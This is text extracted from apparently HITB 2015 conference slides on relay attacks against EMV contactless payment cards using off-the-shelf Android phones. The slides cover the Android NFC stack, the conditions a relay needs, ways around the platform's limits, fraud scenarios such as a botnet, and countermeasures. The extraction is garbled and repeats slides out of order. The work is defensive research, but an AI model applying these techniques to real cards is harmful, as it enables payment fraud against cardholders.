Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
